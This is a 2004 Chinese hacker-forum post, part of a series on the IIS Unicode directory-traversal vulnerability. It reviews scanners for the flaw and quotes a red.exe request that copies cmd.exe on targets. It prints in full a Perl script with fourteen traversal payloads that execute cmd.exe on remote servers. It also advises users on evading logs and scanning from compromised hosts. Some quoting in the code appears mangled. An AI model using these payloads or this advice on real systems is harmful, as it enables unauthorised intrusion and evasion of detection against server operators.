黑色海岸线论坛 - Powered by Discuz! Board

标题: UNICODE漏洞全攻略五 [打印本页]

作者: ☆深蓝T透★ 时间: 2004-1-18 21:52 标题: UNICODE漏洞全攻略五

五、网络里可得到的一些UNICODE扫描程序的分析 1、简单易用的red.exe 操作平台：win9x、NT4、WIN2K 该软件可以在一些中文黑客软件收藏库里找到下载。 red.exe是中国大陆的一位HACK技术爱好者Redp0wer用C++编写的针对某一IP段的 NT主机UNICODE编码漏洞的命令行式扫描工具，该工具扫描速度快，扫描准确。可以在本地和远程NT肉机上执行扫描工作，并产生一个简单的扫描报告RED.txt （仅记录所扫描的IP段的NT主机的IP地址）。该软件对目标NT主机scripts、IISADMPWD、msadc、cgi-bin、_vti_bin目录都做 UNICODE编码漏洞的测试。如果你仅能在本地机上对某个IP段进行扫描，且是固定IP地址的用户，在使用该软件时，你须注意你的扫描行为实际上也把你自己暴露给对方。且容易被对方抓住把柄状告你有入侵行为。我们可以从事件查看器里发现执行的足迹应用程序日志c:＼WINNT＼system32＼config＼AppEvent.Evt 安全日志C:＼WINNT＼System32＼config＼SecEvent.Evt 系统日志C:＼WINNT＼system32＼config＼SysEvent.Evt 我们分析该软件的源码可以看到： GET /%s/%s/winnt/system32/cmd.exe?/c%scopy%s%s:＼＼winnt＼＼system32＼＼cmd.exe%s%s＼＼red.exe HTTP/1.0＼n＼n 如果从安全扫描工具来说，是不应该对所扫描的目标主机做任何文件的增加和修改。所以，在你还不知道怎么消除你的足迹和利用肉机来执行扫描时，最好不要利用这软件作为你的扫描工具。 2、比较全面的UNICODE工具Uni2.pl 只要支持PERL，就可以利用这工具来对目标主机进行UNICODE编码漏洞的扫描。该程序可以对所有存在UNICODE编码漏洞的NT版本进行扫描测试。以下为该软件的源程序，具体如何操作就不做详细解说了。 #!/usr/bin/perl # # Uni2.pl checks a host for the recent IIS unicode vulnerability # in 14 different ways. Also gives you the browser URL for the # exploit. Origionally Stealthmode316, modifications by Roeland # # use Socket; # --------------init if ($#ARGV<0) {die "UNICODE-CHECK Example: ./uni.pl www.target.com:80＼n";} #($host,$port)=split(/:/,@ARGV[0]); ($host = @ARGV[0]); $port = 80; $target = inet_aton($host); $flag=0; # ---------------test method 1 my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir＼n";}} # ---------------test method 2 my @results=sendraw("GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;print "$host/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir＼n";}} # ---------------test method 3 my @results=sendraw("GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir＼n";}} # ---------------test method 4 my @results=sendraw("GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir＼n";}} # ---------------test method 5 my @results=sendraw("GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir＼n";}} # ---------------test method 6 my @results=sendraw("GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir＼n";}} # ---------------test method 7 my @results=sendraw("GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir＼n";}} # ---------------test method 8 my @results=sendraw("GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir＼n";}} # ---------------test method 9 my @results=sendraw("GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir＼n";}} # ---------------test method 10 my @results=sendraw("GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir＼n";}} # ---------------test method 11 my @results=sendraw("GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir＼n";}} # ---------------test method 12 my @results=sendraw("GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir＼n";}} # ---------------test method 13 my @results=sendraw("GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0＼r＼n＼r＼n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir＼n";}} # ---------------test method 14 my @results=sendraw("GET /msadc/..＼%e0＼%80＼%af../..＼%e0＼%80＼%af../..＼%e0＼%80＼%af../winnt/system32/cmd.exe＼?/c＼+dir HTTP/1.0＼r＼n＼r＼n "); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;print "$host/msadc/..＼%e0＼%80＼%af../..＼%e0＼%80＼%af../..＼%e0＼%80＼%af../winnt/system32/cmd.exe＼?/c＼+dir＼n";}} if ($flag!=1) { print "$host: Not vulnerable＼n"; exit; } sub sendraw { $hbn = gethostbyname($host); if ($hbn) { my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,gethostbyname(‘tcp‘)||0) || die("Socket problems＼n"); if(connect(S,pack "SnA4x8",2,$port,$target)) { my @in; select(S); $|=1; print $pstr; while(){ push @in, $_; } select(STDOUT); close(S); return @in; } else { print "$host: Can‘t connect＼n"; exit; } } else { print "$host: Host not found＼n"; exit; } }

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/)